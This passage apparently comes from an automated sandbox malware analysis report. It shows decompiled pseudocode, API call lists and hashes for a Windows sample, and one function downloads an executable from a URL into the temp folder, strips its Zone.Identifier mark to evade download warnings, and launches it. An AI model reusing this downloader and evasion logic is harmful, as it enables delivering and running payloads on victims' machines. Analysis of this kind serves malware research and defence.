                                                                                                                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                                                                                                                    										 *(_t82[2])(1);
                                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L13:
                                                                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x0040ecec
                                                                                                                                                                                                                                                                                    0x0040eced
                                                                                                                                                                                                                                                                                    0x0040ecee
                                                                                                                                                                                                                                                                                    0x0040ecf1
                                                                                                                                                                                                                                                                                    0x0040ecf3
                                                                                                                                                                                                                                                                                    0x0040ecf6
                                                                                                                                                                                                                                                                                    0x0040ecf7
                                                                                                                                                                                                                                                                                    0x0040ecf9
                                                                                                                                                                                                                                                                                    0x0040ecfa
                                                                                                                                                                                                                                                                                    0x0040ecfb
                                                                                                                                                                                                                                                                                    0x0040ecfe
                                                                                                                                                                                                                                                                                    0x0040ed08
                                                                                                                                                                                                                                                                                    0x0040edb9
                                                                                                                                                                                                                                                                                    0x0040edc0
                                                                                                                                                                                                                                                                                    0x0040edc9
                                                                                                                                                                                                                                                                                    0x0040ed0e
                                                                                                                                                                                                                                                                                    0x0040ed0e
                                                                                                                                                                                                                                                                                    0x0040ed14
                                                                                                                                                                                                                                                                                    0x0040ed1a
                                                                                                                                                                                                                                                                                    0x0040ed1d
                                                                                                                                                                                                                                                                                    0x0040ed20
                                                                                                                                                                                                                                                                                    0x0040ed24
                                                                                                                                                                                                                                                                                    0x0040ed29
                                                                                                                                                                                                                                                                                    0x0040ed2e
                                                                                                                                                                                                                                                                                    0x0040edae
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ed30
                                                                                                                                                                                                                                                                                    0x0040ed30
                                                                                                                                                                                                                                                                                    0x0040ed3c
                                                                                                                                                                                                                                                                                    0x0040ed3e
                                                                                                                                                                                                                                                                                    0x0040ed99
                                                                                                                                                                                                                                                                                    0x0040ed99
                                                                                                                                                                                                                                                                                    0x0040ed9f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ed40
                                                                                                                                                                                                                                                                                    0x0040ed4f
                                                                                                                                                                                                                                                                                    0x0040ed51
                                                                                                                                                                                                                                                                                    0x0040ed52
                                                                                                                                                                                                                                                                                    0x0040ed53
                                                                                                                                                                                                                                                                                    0x0040ed56
                                                                                                                                                                                                                                                                                    0x0040ed56
                                                                                                                                                                                                                                                                                    0x0040ed58
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ed5a
                                                                                                                                                                                                                                                                                    0x0040ed5a
                                                                                                                                                                                                                                                                                    0x0040eda4
                                                                                                                                                                                                                                                                                    0x0040ed5c
                                                                                                                                                                                                                                                                                    0x0040ed5c
                                                                                                                                                                                                                                                                                    0x0040ed60
                                                                                                                                                                                                                                                                                    0x0040ed68
                                                                                                                                                                                                                                                                                    0x0040ed6d
                                                                                                                                                                                                                                                                                    0x0040ed72
                                                                                                                                                                                                                                                                                    0x0040ed7e
                                                                                                                                                                                                                                                                                    0x0040ed86
                                                                                                                                                                                                                                                                                    0x0040ed8d
                                                                                                                                                                                                                                                                                    0x0040ed93
                                                                                                                                                                                                                                                                                    0x0040ed97
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ed97
                                                                                                                                                                                                                                                                                    0x0040ed5a
                                                                                                                                                                                                                                                                                    0x0040ed58
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ed3e
                                                                                                                                                                                                                                                                                    0x0040edb2
                                                                                                                                                                                                                                                                                    0x0040edb2
                                                                                                                                                                                                                                                                                    0x0040edb2
                                                                                                                                                                                                                                                                                    0x0040ed2e
                                                                                                                                                                                                                                                                                    0x0040edce
                                                                                                                                                                                                                                                                                    0x0040edd5

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                                                                                                                                                                                                                    • Instruction ID: 3a2f59321ed5ce9e4411fbddcfe45a6f13acd9b1bb36b3b9b432ddda2576079b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4321D872900205ABCB14DF6AC8C09A7BBA5FF44310B05887AE9159B285D734F925C7E0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E0040D4F0(char* _a4, char _a8) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				signed char _v1045;
                                                                                                                                                                                                                                                                                    				short _v1572;
                                                                                                                                                                                                                                                                                    				void* _v1576;
                                                                                                                                                                                                                                                                                    				void* _v1580;
                                                                                                                                                                                                                                                                                    				short _v2100;
                                                                                                                                                                                                                                                                                    				void _v2364;
                                                                                                                                                                                                                                                                                    				long _v2368;
                                                                                                                                                                                                                                                                                    				long _v2372;
                                                                                                                                                                                                                                                                                    				void* _v2376;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v2380;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2384;
                                                                                                                                                                                                                                                                                    				char _v2385;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2392;
                                                                                                                                                                                                                                                                                    				signed int _t88;
                                                                                                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                                                                                                    				int _t96;
                                                                                                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                                                                                                    				signed char _t125;
                                                                                                                                                                                                                                                                                    				signed char _t127;
                                                                                                                                                                                                                                                                                    				void* _t181;
                                                                                                                                                                                                                                                                                    				void* _t182;
                                                                                                                                                                                                                                                                                    				void* _t184;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				srand(GetTickCount());
                                                                                                                                                                                                                                                                                    				_t182 = _t181 + 4;
                                                                                                                                                                                                                                                                                    				_v1045 = 0;
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                                                                                                                                                                                                                    				_v2380 = _a4;
                                                                                                                                                                                                                                                                                    				_v2384 = _v2380 + 1;
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_v2385 =  *_v2380;
                                                                                                                                                                                                                                                                                    					_v2380 = _v2380 + 1;
                                                                                                                                                                                                                                                                                    				} while (_v2385 != 0);
                                                                                                                                                                                                                                                                                    				_v2392 = _v2380 - _v2384;
                                                                                                                                                                                                                                                                                    				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                                                                                                                                                                                                                    				_t88 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_t90 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    				_t184 = _t182 + 0x20;
                                                                                                                                                                                                                                                                                    				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v2376 != 0) {
                                                                                                                                                                                                                                                                                    					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v1576 != 0) {
                                                                                                                                                                                                                                                                                    						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v1580 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                                                                                                                                                                                                                    								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							CloseHandle(_v1580);
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                                    							DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                                    							Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    							_t125 = E0040D1D0( &_v1572);
                                                                                                                                                                                                                                                                                    							_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                                    							if((_t125 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    								_t127 = E0040D390( &_v1572);
                                                                                                                                                                                                                                                                                    								_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                                    								if((_t127 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    									_t51 =  &_a8; // 0x405de1
                                                                                                                                                                                                                                                                                    									if(( *_t51 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    										ExitProcess(0);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v1045 = 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_v1580);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v1576);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InternetCloseHandle(_v2376);
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				_t96 = _v1045 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				if(_t96 == 0) {
                                                                                                                                                                                                                                                                                    					_t97 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                                                                                                                                                                                                                    					_t99 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t101 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push( &_v1572);
                                                                                                                                                                                                                                                                                    					_push( &_v1044);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					L0040ECB2();
                                                                                                                                                                                                                                                                                    					if(_t96 == 0) {
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                                    						DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    						if((E0040D1D0( &_v1572) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    							return DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    						_t111 = E0040D390( &_v1572) & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							return _t111;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t79 =  &_a8; // 0x405de1
                                                                                                                                                                                                                                                                                    						if(( *_t79 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						ExitProcess(0);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t96;
                                                                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                                                                    0x0040d500
                                                                                                                                                                                                                                                                                    0x0040d505
                                                                                                                                                                                                                                                                                    0x0040d508
                                                                                                                                                                                                                                                                                    0x0040d520
                                                                                                                                                                                                                                                                                    0x0040d529
                                                                                                                                                                                                                                                                                    0x0040d538
                                                                                                                                                                                                                                                                                    0x0040d53e
                                                                                                                                                                                                                                                                                    0x0040d546
                                                                                                                                                                                                                                                                                    0x0040d54c
                                                                                                                                                                                                                                                                                    0x0040d553
                                                                                                                                                                                                                                                                                    0x0040d568
                                                                                                                                                                                                                                                                                    0x0040d583
                                                                                                                                                                                                                                                                                    0x0040d58b
                                                                                                                                                                                                                                                                                    0x0040d590
                                                                                                                                                                                                                                                                                    0x0040d59f
                                                                                                                                                                                                                                                                                    0x0040d5a4
                                                                                                                                                                                                                                                                                    0x0040d5c6
                                                                                                                                                                                                                                                                                    0x0040d5cc
                                                                                                                                                                                                                                                                                    0x0040d5e2
                                                                                                                                                                                                                                                                                    0x0040d5ef
                                                                                                                                                                                                                                                                                    0x0040d611
                                                                                                                                                                                                                                                                                    0x0040d61e
                                                                                                                                                                                                                                                                                    0x0040d640
                                                                                                                                                                                                                                                                                    0x0040d64d
                                                                                                                                                                                                                                                                                    0x0040d653
                                                                                                                                                                                                                                                                                    0x0040d69e
                                                                                                                                                                                                                                                                                    0x0040d69e
                                                                                                                                                                                                                                                                                    0x0040d6ad
                                                                                                                                                                                                                                                                                    0x0040d6c6
                                                                                                                                                                                                                                                                                    0x0040d6d6
                                                                                                                                                                                                                                                                                    0x0040d6e1
                                                                                                                                                                                                                                                                                    0x0040d6ee
                                                                                                                                                                                                                                                                                    0x0040d6f3
                                                                                                                                                                                                                                                                                    0x0040d6fb
                                                                                                                                                                                                                                                                                    0x0040d740
                                                                                                                                                                                                                                                                                    0x0040d6fd
                                                                                                                                                                                                                                                                                    0x0040d702
                                                                                                                                                                                                                                                                                    0x0040d70f
                                                                                                                                                                                                                                                                                    0x0040d714
                                                                                                                                                                                                                                                                                    0x0040d71d
                                                                                                                                                                                                                                                                                    0x0040d71f
                                                                                                                                                                                                                                                                                    0x0040d726
                                                                                                                                                                                                                                                                                    0x0040d72a
                                                                                                                                                                                                                                                                                    0x0040d72a
                                                                                                                                                                                                                                                                                    0x0040d730
                                                                                                                                                                                                                                                                                    0x0040d730
                                                                                                                                                                                                                                                                                    0x0040d737
                                                                                                                                                                                                                                                                                    0x0040d6fb
                                                                                                                                                                                                                                                                                    0x0040d74d
                                                                                                                                                                                                                                                                                    0x0040d74d
                                                                                                                                                                                                                                                                                    0x0040d75a
                                                                                                                                                                                                                                                                                    0x0040d75a
                                                                                                                                                                                                                                                                                    0x0040d767
                                                                                                                                                                                                                                                                                    0x0040d772
                                                                                                                                                                                                                                                                                    0x0040d778
                                                                                                                                                                                                                                                                                    0x0040d781
                                                                                                                                                                                                                                                                                    0x0040d787
                                                                                                                                                                                                                                                                                    0x0040d78c
                                                                                                                                                                                                                                                                                    0x0040d79e
                                                                                                                                                                                                                                                                                    0x0040d7a4
                                                                                                                                                                                                                                                                                    0x0040d7a9
                                                                                                                                                                                                                                                                                    0x0040d7b8
                                                                                                                                                                                                                                                                                    0x0040d7bd
                                                                                                                                                                                                                                                                                    0x0040d7df
                                                                                                                                                                                                                                                                                    0x0040d7e8
                                                                                                                                                                                                                                                                                    0x0040d7ea
                                                                                                                                                                                                                                                                                    0x0040d7f2
                                                                                                                                                                                                                                                                                    0x0040d7f9
                                                                                                                                                                                                                                                                                    0x0040d7fa
                                                                                                                                                                                                                                                                                    0x0040d7fc
                                                                                                                                                                                                                                                                                    0x0040d803
                                                                                                                                                                                                                                                                                    0x0040d81c
                                                                                                                                                                                                                                                                                    0x0040d82c
                                                                                                                                                                                                                                                                                    0x0040d837
                                                                                                                                                                                                                                                                                    0x0040d851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d88e
                                                                                                                                                                                                                                                                                    0x0040d858
                                                                                                                                                                                                                                                                                    0x0040d86d
                                                                                                                                                                                                                                                                                    0x0040d872
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d874
                                                                                                                                                                                                                                                                                    0x0040d87b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d87f
                                                                                                                                                                                                                                                                                    0x0040d87f
                                                                                                                                                                                                                                                                                    0x0040d803
                                                                                                                                                                                                                                                                                    0x0040d897

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D4F9
                                                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 0040D500
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D520
                                                                                                                                                                                                                                                                                    • mbstowcs.NTDLL ref: 0040D583
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D58B
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D59F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D5C6
                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D5DC
                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D60B
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D63A
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040D66D
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040D69E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D6AD
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D6C6
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D6D6
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D72A
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040D702
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: memset.NTDLL ref: 0040D39E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: CreateProcessW.KERNEL32(00000000,'b@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040D3E5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: Sleep.KERNELBASE(000003E8), ref: 0040D3F5
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D740
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D74D
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D75A
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D767
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D772
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D787
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0040D79E
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D7A4
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D7B8
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D7DF
                                                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040D7FC
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D81C
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D82C
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D837
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D6E1
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D204
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D225
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D244
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D25D
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040D858
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D87F
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D88E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36$]@
                                                                                                                                                                                                                                                                                    • API String ID: 3135114409-3650745090
                                                                                                                                                                                                                                                                                    • Opcode ID: 2b318facc40237961988d4633bef23f1fd430d2f89d1c5a367f5bf161b193eb1
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a692bf560fa698191a4ba968421e092d812baa048ff7158642ad85748ebf153
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b318facc40237961988d4633bef23f1fd430d2f89d1c5a367f5bf161b193eb1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C291C6B5D00318ABEB24DB50DC45FED7779AB88301F0484F9F609A61C1DAB99AC4CF28
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 432 40e400-40e427 GetTickCount WaitForSingleObject 433 40e5a9-40e5af 432->433 434 40e42d-40e444 WSAWaitForMultipleEvents 432->434 435 40e4d0-40e4e3 GetTickCount 434->435 436 40e44a-40e461 WSAEnumNetworkEvents 434->436 438 40e523-40e52c GetTickCount 435->438 439 40e4e5-40e4f4 EnterCriticalSection 435->439 436->435 437 40e463-40e468 436->437 437->435 440 40e46a-40e470 437->440 441 40e595-40e5a3 WaitForSingleObject 438->441 442 40e52e-40e53d EnterCriticalSection 438->442 443 40e4f6-40e4fd 439->443 444 40e51a-40e521 LeaveCriticalSection 439->444 440->435 447 40e472-40e491 accept 440->447 441->433 441->434 448 40e581-40e591 LeaveCriticalSection GetTickCount 442->448 449 40e53f-40e557 InterlockedExchangeAdd call 40be60 442->449 445 40e515 call 40e300 443->445 446 40e4ff-40e507 443->446 444->441 445->444 446->443 450 40e509-40e510 LeaveCriticalSection 446->450 447->435 452 40e493-40e4a2 call 40df90 447->452 448->441 457 40e577-40e57f 449->457 458 40e559-40e562 449->458 450->441 452->435 459 40e4a4-40e4bf call 40e220 452->459 457->448 457->449 458->457 460 40e564-40e56d call 409600 458->460 459->435 465 40e4c1-40e4c7 459->465 460->457 465->435 466 40e4c9-40e4cb call 40e7d0 465->466 466->435
                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040E400(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                                                                    				long _v72;
                                                                                                                                                                                                                                                                                    				signed char _v80;
                                                                                                                                                                                                                                                                                    				long _v92;
                                                                                                                                                                                                                                                                                    				char _v96;
                                                                                                                                                                                                                                                                                    				char _v100;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				long _t33;
                                                                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                                                                    				long _t42;
                                                                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr _t70;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                                                                    				long _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t76;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                                                                                                                                                                                                                    				_t31 = GetTickCount();
                                                                                                                                                                                                                                                                                    				_t56 = _a4;
                                                                                                                                                                                                                                                                                    				_v72 = _t31;
                                                                                                                                                                                                                                                                                    				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                                                    					return _t33;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					_t73 = _t56 + 0x18;
                                                                                                                                                                                                                                                                                    					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
